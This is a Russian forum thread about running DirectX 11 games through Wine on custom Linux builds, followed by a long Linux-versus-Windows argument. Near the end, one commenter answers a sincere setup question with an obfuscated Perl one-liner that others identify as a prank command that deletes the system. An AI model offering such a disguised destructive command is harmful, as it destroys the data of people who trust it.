Linux + directX11 + unreal engine 4

Товарищи прекрасная новость! команда Wine CSMT наконец победила "защиту от запуска игр" называемую Directx11


Divinity original sin 2

https://www.youtube.com/watch?v=swxDhsQhXsc

чуть позже после записи было выяснено что если убрать тени - то игра идет на 60 FPS

но увы вовремя недогадался.



Я специально сделал целых 3 релиза на 3 разных основах чтобы каждый мог потестить систему с уже установленным wine  и wineprefix

Выбраны были: Linux mint 18.1 x64 lts  c Mate, ubuntu 16.04.1.lts x64 c mate, mx-linux 16 x64 c mate. Все системы debian based и на всех можно запускать игры с Steamos тоже разумеется.


https://rutracker.cr/forum/viewtopic.php?t=5343942 - Минт

https://rutracker.cr/forum/viewtopic.php?t=5345515 - Убунту

https://rutracker.cr/forum/viewtopic.php?t=5352658 - МХ


я лично протестировал Divinity o.s. 2 и если не записывать ролики то можно даже полноценно играть без единого графического бага где то на 40fps



также пользуясь случаем выкладываю скомпилированный мной unreal engine 4.14 с комплектом из marketplaсe (установить комплект это целая история не меньше чем установить и правильно настроить систему и wine + wineprefix + всё обновить и поставить ядро) . Контент обычным образом не скачать т.к. для скачки требуется microsoft windows.

тут epic games конечно выпендрилась. к движку и игре полностью идущим на линукс требовать качалку требующую виндовс...


https://rutracker.cr/forum/viewtopic.php?t=5352050

https://rutracker.cr/forum/viewtopic.php?t=5355600

Надеюсь кому то это будет полезно и пригодится.

Linux + directX11 + unreal engine 4 Linux, Игры, Linux mint, Ubuntu, Mate desktop, Divinity: Original Sin 2, Wine, Wine-staging
Вы смотрите срез комментариев. Показать все
6
Автор поста оценил этот комментарий
Вот зачем такой гемор, выдели диск под винду и не еби гусей
раскрыть ветку (22)
8
Автор поста оценил этот комментарий
за 10 лет я лишь 1 раз выделил диск под винду ради ведьмака 3 . где то через неделю после прохождения отформатировал ссд, т.к. он мне нужен был для более важных вещей. поиграл, стёр нигде не логинясь. больше ни для чего не понадобилось.

Мне потенциальная дыра подотчётная не мне,  в системе ненужна даже если и я сам никому особо ненужен.

раскрыть ветку (21)
1
Автор поста оценил этот комментарий

А у меня с линуксом как-то не складывается. Много раз пробовал ставить, то среда разработки под java критует постоянно, то сама ось слетает после обновления драйверов на видео-карту, то еще какая-то херня. Давны давно еще, когда только купил компьютер и привыкал к 98винде, а потом и к хп, столько раз убивал ось, что до сих пор помню наизусть 25значнык ключ активации)) Я либо не в меру любопытный, либо слишком криворукий :(

раскрыть ветку (4)
4
Автор поста оценил этот комментарий

может просто неудачно выбранная основа. если не получается надо через год обязаельно ещё раз попробовать ) часто это помогало решить некоторые вопросы)

а вот линукс это не винда. тут можно самому решить что обновлять что нет.

можно и вообще не обновлять - работает - не трогай.

я лично придерживаюсь этой политики и компьютеры по 5 лет работают.

обновляю прицельно нужные мне программы - kernel, wine, firefox,  и ещё с десяток названий.


но если очень скучно и хочется развлечений можно конечно apt-get upgrade сделать.

иногда бывает хочется но лучше не на основном компьютере.


я тоже помнил одно время  ключ и к 98 и к xP в 2006 году я понял что микрософт всё больше начинает делать винду всё самостоятельнее, указывать кто на компьютере хозяин и решился на смену.  конечно первые опыты были разумеется неудачные , тогдашняя mandrake 9.2  попросту  с модемом не пустила в инет.


сам раньше кодил на php, netbeans на java как раз.. работала как часы. правда я с 2012 уже не пишу в PHP ничего к сожалению.


раскрыть ветку (3)
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку (2)
2
Автор поста оценил этот комментарий
да необходимость развития проекта dbscript4 попросту исчезла. я его разрабатывал для своих задач и командного управления игровыми БД, ну и параллельного делился наработками с другими людьми кто тоже занимался этим же.отличалось от других программ

тем что поддерживало некоторые типичные для mangos вещи. линковку между таблицами и поле data само по себе являющееся таблицей внутри ячейки таблицы.

а сейчас нет задач во первых для чего он был бы мне нужен. сервера давно нет с игрой.

а во вторых я пробовал адаптировать код к новой версии PHP  и у меня не вышло его ни адаптировать ни переписать, да и особо старатся было уже ненужно.

Хотя если кто другой возьмет код и доработает я только рад буду)

https://github.com/dj--alex/db-script/issues

от всего видео осталось всего одно https://www.youtube.com/watch?v=-3uftGYkccE

Автор поста оценил этот комментарий
повзрослел))
1
DELETED
Автор поста оценил этот комментарий
Если вас беспокоит слежка, то что вы делаете в интернете?
А суть сборок непонятна... Установка софта реализуется одним скриптом, а то мне что-то вспомнились говносборки хр ультимейт про васян ультра едишн с нескучными обоями и мате вместо десктопа.
раскрыть ветку (15)
2
Автор поста оценил этот комментарий

Меня слежка не беспокоит, на линуксе соблюдая самые простейшие правила безопасности

например не давать никому свой root пароль вполне достаточно для спокойной жизни

и не нужно боятся ни чужих флешек, ни дисков с 1С бухгалтерией ( нам вирусы в учебку как то там занесли)

ни неквалифицированных гостей.


Да давайте напишите этот один скрипт а я пойду отдыхать, мне уже 10 лет надоело с этим возится

сначала для себя а потом и для народа.

Напишите один скриптик который за 5 минут всё сделает и протестирует и будем в продакшен выкладывать

Вот мои краткие требования.

1) надо поставить самое новое ядро которое работает стабильно, проверить как оно работает с Nvidia, проверить как оно работает с AMD. желательно несколько видеокарт. если был чёрный экран то наверное ядро или драйвер несовместимы, но я уверен вы это сделаете за 1 минуту включая физическое перетыкание карт. Вы же за 5 минут со всем справитесь. все карты вы конечно не протестите , но если к вам часто носят ноутбуки на ремонт я думаю тестировать будет на чём.

и так едем дальше

2) Нужно наполнить wineprefix 32 бит

в базовый комплект входят vcredist целая пачка, directx, physx, .NET 1.1,2.0,3.0,4.0,

после того как поставите всё в правильном порядке ну и скачаете всё из интеренета разумеется,т.к. на сайте микрософт уже добавили проверку в некоторые программы и если она в реестре wine находит ключ wine то просто не ставится. Если поставите что то в неверном порядке не страшно. удаляете нафиг весь .wineи ещё раз повторяете процедуру.

Не забудьте в релизе же нельзя тестировать. делаете копию системы и wine - и тестируете на хотя бы 20 играх то что вы настроили, вносите коррективы, ну например mfc40 или xaudio установить. потом ещё раз.`

Не забывайте у вас всего 5 минут на все задачи. желательно уложится в 1 минуту.

Выберем наугад какой нибудь софт для тестового компьютера кроме игр:

Adobe Audition 3.0 i Sony Vegas 8 должны работать если вы всё верно сделали.

3) Точно также наполняем префикс 64бит. с ним чуток проще т.к. часть компонентов .NET например несовместимы и будет использован Mono.

Не забудьте Ведьмак 3 должен стабильно работать и не вылетать. В следущем патче с текстурами думаю ок будет но стабильно работать он ОБЯЗАН уже сейчас.

Снова тестируем на тестовом стенде всё.

4) простой шаг - устанавливаете новые версии компонентов системы так чтобы не повредить другие.

vlc, firefox, gimp . программы должны быть достаточно универсальны и не требовать доустановки Gstreamer кодеков и прочей дребедени. ну и не должно быть геморроя при внезапном желании пользователя поставить Jаva или adobe flash

5) А теперь надо сохранить все достижения, для этого нужна утилита по созданию сборки. (она же и используется для бэкапа, умные люди ведь делают бэкапы верно? т.е это однозначно нужная вещь.)

Но есть проблемы с работой с брошенными Remastersys/Systemback, т.к. они брошены - установка на новые системы, а не забывайте вам КАЖДЫЕ полгода придётся делать заново и заново сборки, с каждым разом установка их будет всё интереснее. Скажем так на 17 минте или 16 убунту их установка ещё была относительно проста, с косяками с учётом заморозки пакетов Casper или того чтовместо ubiquity придётся использовать системный установщик Systemback

ну да ладно главное инсталлятор работает

Если вы в состоянии написать скрипт который за 5 минут всё сделает, такую чепуху как инсталлятор вы вообще мгновенно напишете.

Да кстати задонатьте им тоже как и я, вы же хотите поблагодарить ребят за то что они вообще создали такую прекрасную утилиту.

6) на сладкое - добавляем горячие комбинации клавиш для диспетчера задач, сброса разрешения экрана на стандартное через xrandr, ну чтобы если старая игрушка попадётся пользователю можно было легко и быстро исправить что она сменит разрешение или закрыть её. а да для wineserver -killall тоже команда.

7) КАждый выход новой версии или выход критически важного элемента надо будет делать перевыпуск ISO

но я думаю ваш уберскрипт 5-минутный с этим справится.

8) а да. чуть не забыл , не забудьте проверить локализацию

Пользователи очень не любят когда Firefox или LibreOffice на английском или вместо яндекса поиск идёт в Озоне или где то ещё в Amazone.

9) И ещё переключение языков. вроде всё вспомнил.

10) забыл ещё. нужно все время выбирать примерно один DE Для привычного вида системы.

ну и чтобы вам удобнее было отвечать на вопросы пользователей а не спрашивать а в каком углу экрана у вас пуск, а где у вас часы находятся а где network manager) по телефону это очень дорого.

для тех кто обновляется со старых версий, а поменять ДЕ сможет каждый при желании ( разумеется проверить хотя бы установку KDE, XFCE и ещё чего нибудь тоже надо, надеюсь вы не успели их поломать за предыдущие 9 шагов) .

Вы же ставите очень быстро у вас всего 5 минут на все операции.


ВУАЛЯ!! вы за 5 минут всё настроили! поздравляю с получением звания грандмастера!


По поводу сборок у меня уже был обзор считаю чтоя ответил на этот вопрос.

https://www.youtube.com/watch?v=0Hr5V-NlOPs


Ну а я пошёл отдыхать. У нас родился гений goldstar2154 который за 5 минут всё сделает, обращайтесь к нему.

раскрыть ветку (4)
1
DELETED
Автор поста оценил этот комментарий

Возвращаясь к вопросу о сексе с гусями. Зачем это все делать, если винда умеет это из коробки?

Не поймите меня неправильно, но ОС это инструмент и выбор инструмента должен соответствовать задаче. Равноодинаково глупо колоть орехи микроскопом или разглядывать бактерии через молоток. Линукс мастхэв для программистов, можно держать зоопарк компиляторов/либ/репов и прочей радости. Быстро, удобно, надежно. А для игр и сони вегасов почему бы не использовать винду? Времена когда случайная флешка убивает систему и заражает сеть уже прошли, штатные средства обеспечивают приличный уровень защиты (если не качать непонятный софт непонятно откуда, но ведь это справедливо и для линукса, где точно также можно скачать левый пакет который сделает дыру в безопасности)


Что касается скрипта, то я не говорил, что он будет маленьким 5-минутным скриптиком, нет, это будет, как правильно написали ниже, скриптище, размером с сильмариллион.


Суть моего доёба в том, что популяризаторство линукса это хорошо, но делаете вы его странным на мой взгляд способом. Путь линукса это когда пользователь понимает, что он ставит и зачем, т.е. максимальная прозрачность системы и компонентов с полным пониманием пользователя что ему нужно. А не использовать винду потому что "О божечки, это ж глючные форточки, анальная слежка кругом, вирусы, проприетарщина, азаза" глупо.


P.S. убунта кстати является одним из самых критикуемых дистров т.к. внезапно она тоже проприетарная и в версии 12,10 был неприятный прецедент, когда юнити стал сливать поисковые запросы из даша в амазон (потом это конечно выпилили). И куча прессинга со стороны Каноникал на сайты, объясняющие как это отключить. Также можно добавить планы шатлворта об отказе от иксов, что не есть гуд, т.к. врядли все ДЕ резко откажутся от иксов.


Так что резюмируя вышесказанное, играм, вегасу и другому специфичному софту - винда, остальному - линукс.

раскрыть ветку (3)
2
Автор поста оценил этот комментарий
Я вам попробую обьяснить но скорее всего зазря т.к. вы это все равно не поймете.

и не захотите пониматью


Причины по которым ЛИЧНО Я НЕ ИСПОЛЬЗУЮ ШИНДОВС. Другие пользователи могут себе выбрать какие им нравится или пропустить это.


1. Я не люблю ребутится в ненадёжную по умолчанию, засоряющуюся, глючнуЮ и подконтрольную МС систему

дело даже не в слежке, уже почти готов механизм который отслеживает установку кряков .

Таким же образом благодаря бэкдору был удален Тор с миллионов компьютеров когда микрософт почитала это нужным.

нужен ли мне легальный бэкдор и троян на компе? наверное нет, не нужен.

и заменяет их на легальные приложения, также всё чаще хватают людей и сажают в нашей стране за установки систем микрософт, да дают условные сроки и штрафы от 100000 рублей. но это есть

можете не рассказывать что такое мало с кем бывает. у меня друг вчера просил денег т.к. взяли его.

и я знал что рано или поздно те кто ставят винду обязательно попадутся. И дальше будет только хуже т.к. винда - платная система.

Я хотя и редко что использую из платного ПО. но всеже отметил это.

Линукс да не идеален в плане безопасности, но он точно в 10 раз лучше того что может предложить винда даже в идеальном варианте

Ну и на линуксе можно жить расслабленней и не напрягатся.

На винде кстати постоянно тоже разные истории были сввязи с которыми и меня вызывали

https://www.youtube.com/watch?v=JjtgJMfKp9M - вот как вы это обьясните? что надо делать кого звать?


2. Мне не нравится политика компании микрософт и

попытки захватить свободную платформу, попытки добить в корне всё то что должно быть свободным и доступным все

например с помощью DirectX заставить всех играть только на Windows и только самой новой версии

если бы разработчики не убеждались Микрософтом под что писать, скорее всего писали бы под кроссплатформу

т.е. Vulkan/ OpenGL и производительность была бы выше и пользователь смог бы сам на ЛЮБОЙ ос запускать любую игру

но DirectX нужен только для того чтобы привязать вас к винде и именно поэтому его продвигают


3. Я могу ради какой то программы или игры установить 30дневный триал винды. попользоватся тем что мне нужно и стереть её после этого. Да и ещё место нужно держать для этой системы,а места ей надо немало не меньлше 50 гб.

линуксовые разделы EXT4 она не видит может и к лучшему , ей необходимо копировать нужные ей данные, ну нафиг.

НО я не люблю перезагружатся в винду. и не доверяю ей. вообще ничего.

Для меня винда это лаунчер приложения которое не может запуститься на линуксе

потому что микрософт убедила его авторов какая система правильная и на какой ОС должно работать это приложение.

4. ДА я знаю про прогу которая позволяет видеть ext4 разделы. она глючная и после её использования хард начал сбоить пришлось переформатировать. Ей нельзя записывать данные вообще. .


5. Я удивлю но чайникам у которых линукс, приходится помогать намного реже

они спокойно сидят, тыкают на всём. качают амиги и кометы и маил-гуарды и те у них тупо не срабаывают и они живут нормально.

и не нужно каждую неделю к ним приходить чтобы говнософт почистить.

Линукс для невнимателньых пользователей сейчас наиболее предпочтительный вариант

Для безопасности важно просто не давать sudo тому чего не знаешь и что не проверено.

Ну и не ставить "Патч Бармина" (известная шутка с Лурка, вы её уже сегодня использовали)



6. Все компоненты убунту разве нельзя скачать и посмотреть исходники? сообщество разве не этим занимается при доработке ПО ? Хотя лично я использую Mint. (в нем наиболее раздражающие косяки исправлены)

да и мне до лампочки что у них что то проприетарное есть -

это не винда - взял удалил проприетнрные драйверы и прошивки и пользуйся.

в винде ты не можешь поменять оболочку графическую на совсем другую, основная пришита намертво и неудаляема

мало того только микрософт ей управляет. если они решат ещё раз навязать всем метро вы все будете им пользоватся

хотите или нет.

А в убунту не нравится Унити - взял и снёс нафиг) и поставил MATE ili KDE

У меня на втором компьютере без проприетарного кода на Mesa 17 всё что мне нужно работает

включая даже Farcry 3 i UE4 (!!) на Radeon 6800.


7. Шаттл-в-рот может отказыватся от чего угодно.

пока от этого не откажется ВСЁ сообщество его никто слушать не будет.

он отказался от Gnome2,и авторы Gnome2 отказались от гнома

но это и есть преимущество свободного софта

Фирма бросила всё. А другие люди взяли подхватили Гнома и сделали MATE destkop и Cinnamon

Очень популярные столы за год оказавшиеся портированными на всех линукс системах.

Если же микрософт решила что то закопать то она обеспечит геморрой тем пользователям которым захочет.

Пользователи XP уже это прочувствовали в полной мере.

Это неправильно когда копираст и проприетарная компания ДАВИТ на производителей материнок и программ

это единственный способ показать им что не правы они.

Лично я от использование оригинальной убунты отказался с 11.10 и не зря.

Но сейчас даже эту глупую оболочку они более менее вменяемой сделали

но главное достижение убунту стандартизация и продвижение Дебиан стандарта.

Всё что сделано на Ubuntu будет работать на SteamOS/ Debian/ Mint / Elementary OS...

и это без какого либо портирования и затруднений

Это большая база репозиториев и ПО для меня в первую очередь

а не ОС с Unity которую надо немедленно удалить после установки.

Тем более есть версия с МАТЕ.


8. Для виндузятников:: Единственный способ сделать Windows лучше.

это популяризовать линукс. Хотите чтобы винда была лучше заставтьте микрософт пошевелится.

Как ни парадоксально но только так это можно сделать.

Пока у виндовс нет конкурента микрософт будет всё что хочет делать и вы будете это всё терпеть.

Пример:

Интел расслабился конкретно за те 5 лет пока АМД выпускала один и тот же процессор под разными названиями

оно надо +3% скорости каждый год и новый сокет каждый год или полгода?

а АМД выпустила что конкурентное и Intel Зашевелился.

Это единственный способ заставить кого то шевелится. увы.



9. Резюмуя, пока что некоторый софт ещё вынужденно придётся запускать на винде.


Но такого софта постепенно становится всё меньше.

Лично для меня такой софт закончился 10 лет назад

кому то повезло меньше. кто то например привык к Cubase или ещё к какому то монстру который только для православной ОС. и то вроде бы и его уже запустили.

Если бы пользователи задавали чаще вопрос своей фирме про порт на линукс и что программа будет куплена

уже было бы таких программ больше

чаще всего написать письмо в поддержку никто не способен. дело ограничивается просмотром и закрытием сайта Winehq

без письма без изучения альтернатив.

раскрыть ветку (2)
DELETED
Автор поста оценил этот комментарий

лимит использований патча Бармина достигунт, больше не буду :)

а как вы относитесь к MacOS?

ну и про мобильные ос (иос/андроид/виндовс/убунту тач) было бы интересно услышать отзыв

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

пользовался смотрел. у меня друг журналист в крупном журнале работает. система как и виндовс выглядит хорошо, но производитель является проприетарщик и выглядит более мило только потому что занимает меньше долю рынка. стоит ему получить больше и он немедленно попытается начать диктовать свои условия в жёсткой форме производителям софта. где надо его выпускать а где это недостаточно православно. также если у них будут шире возможности они обязательно начнут делать "чёрный пиар" или маркетинг по поводу того что Metal API это круто а всё остальное просто глючное тормозное *известная субстанция* Просто у них сейчас не те возможности. это не свободная система, а сам автор тоже очень любит анально огораживать своих пользователей. чего только стоит невозможность вставлять флешки в их телефоны или ставить специальное ПО (кивок в сторону iTunes)  для того чтобы на телефон что то закинуть. хотя может быть они пересмотрят в будущем свою политику в эту сторону но маловероятно.

Автор поста оценил этот комментарий

Братиш, раз уж ты тут, а тс вполне ясно сказал сказал к кому  обращаться. Подскажи, что в префикс по умолчанию добавить и как его лучше настроить. Буду очень благодарен. Без шуток.

раскрыть ветку (9)
DELETED
Автор поста оценил этот комментарий

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


не забудьте перл поставить)

раскрыть ветку (8)
1
Автор поста оценил этот комментарий

Зачем ты мне rm пихаешь, дурачок что ли ? Я тебя по человечески спросил. Не можешь ответить ? #язабан

раскрыть ветку (6)
DELETED
Автор поста оценил этот комментарий

извините, я играю на винде, секса с вайном мне хватило на долгие годы вперед)

раскрыть ветку (5)
1
Автор поста оценил этот комментарий

Ало, ты наркоман что ли ? Я тебе вопрос задал, что ты вообще несешь ?

раскрыть ветку (4)
DELETED
Автор поста оценил этот комментарий

я не пользуюсь вайном и не в состоянии корректно ответить на ваш вопрос

раскрыть ветку (3)
1
Автор поста оценил этот комментарий

Судя по ответам ты мозгом не пользуешься, а не вайном :D

раскрыть ветку (2)
DELETED
Автор поста оценил этот комментарий

пусть будет так

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Патч Бармина, с лурка скопировали?

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку